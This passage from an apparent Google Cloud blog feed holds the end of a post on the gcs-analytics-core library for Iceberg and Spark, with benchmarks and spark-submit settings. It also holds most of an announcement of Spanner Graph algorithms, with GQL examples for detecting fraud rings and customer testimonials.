&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table style="width: 99.4778%;"&gt;&lt;colgroup&gt;&lt;col style="width: 29.2169%;"/&gt;&lt;col style="width: 32.5301%;"/&gt;&lt;col style="width: 38.253%;"/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;TPC-DS schema size&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scan time improvement&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Execution time improvement&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1 GB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;71.51%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;32.61%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;10 GB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;48.48%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;18.94%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;100 GB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;40.98%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;10.95%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1 TB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;35.86%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3.38%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;10 TB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;18.40%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.58%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As the data shows, there is a consistent improvement across all dataset sizes. The library is effective for the complex query patterns in TPC-DS, delivering scan time reductions that directly lower overall query execution time.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before running your Spark workloads, confirm that the following requirements and configurations are met:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Use Apache Iceberg Spark runtime 1.11.0+ and the iceberg-gcp-bundle 1.11.0+.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Configure your catalog to use GCSFileIO.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the gcs-analytics-core optimization flag (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable vectorized I/O (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;spark.sql.iceberg.vectorization.enabled=true&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to achieve read performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;spark-submit \\\r\n  --packages org.apache.iceberg:iceberg-spark-runtime-3.5_2.12:1.11.0,org.apache.iceberg:iceberg-gcp-bundle:1.11.0 \\\r\n  --conf spark.sql.catalog.$CATALOG_NAME=org.apache.iceberg.spark.SparkCatalog \\\r\n  --conf spark.sql.catalog.$CATALOG_NAME.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO \\\r\n  --conf spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true \\\r\n  --conf spark.sql.iceberg.vectorization.enabled=true \\\r\n  &amp;lt;your-application-jar-or-script&amp;gt;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9f8470b20&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gcs-analytics-core library is open source and available for developers to contribute to the project and explore the source code. Our implementation and micro-benchmark configurations are part of the repository and can be referenced for your contributions or validations.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;GitHub repository:&lt;/strong&gt;&lt;a href="https://github.com/GoogleCloudPlatform/gcs-analytics-core" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GoogleCloudPlatform/gcs-analytics-core&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Documentation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Review the&lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/gcs-analytics-core" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;design document&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for deep architectural details.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We want to hear about your experience. If you test this on your own datasets, please feel free to open an issue on GitHub or share your results with the community. We look forward to seeing how you utilize these optimizations in your data lakes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/optimize-iceberg-and-spark-workloads-with-gcs-analytics-core/</guid><category>Streaming</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/optimize-iceberg-and-spark-workloads-with-gcs-analytics-core/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Ajay Yadav</name><title>Software Engineer</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Nivedita Aggarwal</name><title>Engineering Manager</title><department></department><company></company></author></item><item><title>Announcing Spanner Graph algorithms: Google-grade intelligence for connected data</title><link>https://cloud.google.com/blog/products/databases/introducing-spanner-graph-algorithms/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud Next, we announced the preview of graph algorithms with &lt;/span&gt;&lt;a href="https://cloud.google.com/products/spanner/graph"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, bringing Google Research’s state-of-the-art &lt;/span&gt;&lt;a href="https://research.google/teams/graph-mining/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;graph mining&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; capabilities natively to your database. These graph intelligence capabilities can help you derive valuable insights from graph data faster, cheaper, and at scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprises are increasingly leveraging graph technologies to uncover complex relationships in data for use cases such as fraud detection, social network analysis, entity resolution, and healthcare research. Graph algorithms, such as node centrality and community detection, are the computational methods used to analyze these structures, and work by quantifying the patterns and strength of connections between entities. However, running graph algorithms at scale has historically been challenging and resource-intensive, often requiring complex ETL pipelines to dedicated analytic solutions or risking the transactional performance of the graph database.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We designed Spanner Graph algorithms to tackle demanding enterprise workloads without compromising on the performance of your operational database. This architecture provides several distinct advantages:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Tight integration with GQL:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Directly invoke algorithms using ISO Graph Query Language (GQL) to run structural analytics across your data. By sequentially weaving algorithms and standard queries together, Spanner Graph minimizes complex data movement to external engines, simplifying your architecture and accelerating time-to-insight.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Near-zero transactional impact and lower TCO:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Algorithm execution happens on dedicated compute resources, so as not to impact live production traffic. Spanner automatically provisions resources and securely routes data via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/databoost/databoost-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Data Boost&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; without having to create a custom ETL pipeline. Pay only for what you use, avoiding expensive licensing and operational overhead of legacy solutions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Global insights on billion-edge graphs in minutes&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Built for scale and speed, our engine can run algorithms on graphs with tens of billions of edges within minutes. Encoding topologies in a dense format that’s optimized for random access enables high-performance structural analytics on massive datasets. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While Google Research has published several research papers, held &lt;/span&gt;&lt;a href="https://gm-neurips-2020.github.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;workshops&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and released open-source projects based on its graph mining tools (e.g., for &lt;/span&gt;&lt;a href="https://arxiv.org/html/2411.10290v1" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-core clustering&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;), this is the first time that they are widely available to Google Cloud customers. Let’s take a deeper look at graph algorithms, and how you can use them with Spanner Graph.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Algorithms: Deeper insights for connected data&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When we first launched Spanner Graph, our goal was to reimagine graph data management with a native graph database experience within &lt;/span&gt;&lt;a href="https://cloud.google.com/spanner"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Google’s highly scalable, distributed database. Spanner Graph unifies relational and graph models, allowing developers to query connected data using the ISO GQL, while also interoperating with Spanner's existing tabular, search, and vector capabilities. This allows you to build intelligent applications without creating complex data pipelines, duplicating data, or increasing security and governance risk.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on this foundation, Spanner Graph algorithms help you to extract even deeper insights from your connected data. Graph algorithms analyze the relationships and connections within data, revealing hidden patterns and insights that might be missed with traditional analytical methods. With this launch, you can analyze connectedness to, for example, detect fraud rings, conduct clustering for entity resolution, identify points of failure in complex networks, or recommend products based on the preferences of connected users.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We use g&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;raphs extensively at Google. In fact, many popular algorithms like &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/PageRank" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;PageRank&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the foundational technology that powers Google Search, were invented here. With native algorithm support in Spanner Graph, we are bringing some of Google’s leading graph intelligence capabilities directly to Google Cloud customers, with a set of essential graph algorithms that help you easily uncover the hidden structures within your data:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Centrality&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Pinpoint the most influential and central nodes within your network using betweenness centrality, closeness centrality, and PageRank.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Community detection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Automatically group highly connected entities to uncover hidden segments with label propagation, correlation clustering, modularity clustering, weakly connected components, and clique aggregator.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Similarity and path finding&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Find optimal routes using set-to-set shortest paths, or measure node similarities using Jaccard, cosine, common neighbors, and total &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;neighbors&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;An integrated developer experience&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can invoke g&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;raph algorithms directly using GQL on the entire graph, subgraphs, or a select set of nodes and edges. Spanner offers an integrated workflow: results from graph algorithm runs can be written directly back to Spanner Graph. This lets you invoke algorithms and standard queries sequentially, using the output of one operation as input to the next. Additionally, you can also store results in Cloud Storage buckets.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Example: Uncovering the ringleader of a fraudulent network&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consider a scenario where you are analyzing financial transactions to combat money laundering. Fraudsters usually manipulate a set of “mule” accounts (intermediary accounts for money laundering) that interact with one another to collectively commit fraud. To capture the teamwork between detected and hidden mule accounts, anti-fraud experts usually resort to link analysis and community detection graph algorithms. Here’s how you can use algorithms and queries together in Spanner Graph to catch them.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 1: Identify communities of accounts (algorithm)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;First, we apply a modularity clustering algorithm to cluster accounts into communities. We then write the resulting &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;community_id&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; directly back to the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Account&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; in Spanner Graph.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_community_detection.max-1000x1000.jpg"
        
          alt="1_community_detection"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Runs community detection and update results to the graph\r\nEXPORT DATA OPTIONS(\r\n  format =&amp;#x27;CLOUD_SPANNER&amp;#x27;,\r\n  table = &amp;#x27;Account&amp;#x27;,\r\n  write_mode = &amp;#x27;update_ignore_all&amp;#x27;\r\n) AS\r\nGRAPH FinGraph\r\nCALL ModularityClustering(\r\n  node_labels =&amp;gt; [&amp;#x27;Account&amp;#x27;],\r\n  edge_labels =&amp;gt; [&amp;#x27;Transfer&amp;#x27;]\r\n)\r\nYIELD node, cluster\r\nRETURN node.id, cluster AS community_id;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d19c12e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 2: Pinpoint the suspicious community (query)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Now that every account belongs to a community, we can use a GQL query to perform analytical queries on each community to uncover anomalous behaviors. For example, we can check the total number of known fraud accounts within each community.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;-- Finds the community with the highest concentration of flagged fraud\r\nGRAPH FinGraph\r\nMATCH (a:Account)\r\nWHERE a.community_id IS NOT NULL\r\n  AND a.fraud_flag = TRUE\r\nRETURN a.community_id AS community_id, COUNT(*) AS fraud_count\r\nORDER BY fraud_count DESC;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d19c1eb0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 3: Calculate influence to find the "ringleader" (algorithm on a subgraph)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Let's assume the query above reveals that Community 2 has seen a massive spike in fraudulent activity. In this step, we filter the graph to isolate only the accounts in that specific community and run the PageRank algorithm to find the central ringleader within that exact group.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_centrality.max-1000x1000.jpg"
        
          alt="2_centrality"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;EXPORT DATA OPTIONS(\r\n  format = &amp;#x27;CLOUD_SPANNER&amp;#x27;,\r\n  table = &amp;#x27;Account&amp;#x27;,\r\n  write_mode = &amp;#x27;update_ignore_all&amp;#x27; \r\n) AS\r\n-- Specifies a suspicious subgraph\r\nGRAPH FinGraph\r\nMATCH (n:Account {community_id: 2})\r\nRETURN n\r\nFULL UNION ALL\r\nMATCH -[e:Transfer]-&amp;gt;\r\nRETURN e\r\nNEXT\r\n-- Runs PageRank \r\nCALL PER() PageRank(max_iterations =&amp;gt; 20) \r\nYIELD node, score\r\nRETURN node.id, score AS pagerank_score;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d19c1250&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 4: Investigate the target (query)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Now that the accounts in Community &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;2&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; have a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pagerank_score&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, we can write a query that isolates the most central account and that immediately traces where that specific ringleader moved their funds recently.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Finds the top scorer (ringleader) and trace their money\r\nGRAPH FinGraph\r\nMATCH (ringleader:Account {community_id: 2})\r\nORDER BY ringleader.pagerank_score DESC\r\nLIMIT 1\r\nWITH ringleader\r\nMATCH (ringleader)-[e:Transfer]-&amp;gt;{1, 5}(receiver:Account)\r\nWHERE e.ts &amp;gt; &amp;#x27;2025-12-01&amp;#x27;\r\nRETURN ringleader.id AS ringleader_id, receiver.id AS receiver_id, e.amount, e.ts;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d19c1220&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By allowing you to weave high-performance algorithms with standard GQL queries, Spanner Graph eliminates the need to move data back and forth between operational databases and external analytics engines. This unified approach dramatically simplifies your data architecture and accelerates your time to insight.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Trusted by industry leaders&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Customers like DaVita, Yahoo!, SoundCloud, and WPP are already leveraging Spanner Graph algorithms to solve some of their most complex data challenges.&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Leveraging Spanner Graph for our Patient 360 initiative has allowed us to consolidate complex healthcare data into a single, unified view. The addition of native graph algorithms like community detection and centrality is a major step forward, enabling us to uncover deep insights within our patient networks faster and at scale. These fully managed capabilities allow our team to focus on driving innovation in patient care without the operational burden of managing complex data pipelines." -&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Sam Ghosh, Chief Enterprise Architect at DaVita Kidney Care&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Operating at global scale across Yahoo’s iconic consumer properties requires us to unify billions of user profiles into a single, real-time view. With Spanner Graph, we’ve modeled our Unified User Profile (UUP) as a graph, bringing together previously distributed systems into a centralized source of truth. The addition of fully managed graph algorithms on Spanner further accelerates our ability to deliver personalization at scale. By leveraging algorithms such as community detection and PageRank, we can drive deeper audience segmentation and power more relevant, engaging user experiences across our platform." -&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Chris James, Director of Engineering, Yahoo&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"With 500+ million tracks from 40+ million artists across 190+ countries, SoundCloud is where emerging artists find their sound, hidden gems are discovered, and music culture is shaped in real time. We have been running graph algorithms in batch mode for years, with processes often taking multiple hours on custom clusters to analyze our massive, multi-billion-edge music graph. The launch of Spanner Graph algorithms is a true game-changer: It not only provides the massive scalability we need, but also allows us to move away from complex custom Python workflows to a fully managed service. Most importantly, it unlocks the ability to run graph algorithms on our most up-to-date data for use cases like identifying creator hubs and improving recommendations, without requiring complex ETL pipelines or impacting the low-latency transactional workloads running on Spanner today.&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Sergey Chekanskiy,&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; VP of Engineering - Data Foundation, SoundCloud&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“We've been eager to leverage advanced graph algorithms for Open Intelligence, our foundational intelligence layer that securely connects trillions of live data points from clients, partners and WPP in a privacy-first way and that is now integrated and powers WPP’s agentic marketing platform, WPP Open. In order to have instant, exploratory access to complex relationships across billions of entities – driving planning, modelling, and experimentation — we need native support for deep graph traversal, structural pattern recognition, and advanced algorithms. Algorithm support on Spanner Graph provides the performance and scalability to tackle our most challenging graph analytics problems without operational overhead or expensive licensing."&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Rob Marshall, Head of Strategy, Data &amp;amp; Intelligence, WPP&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Build more intelligent applications&lt;/span&gt;&lt;/h2&gt;
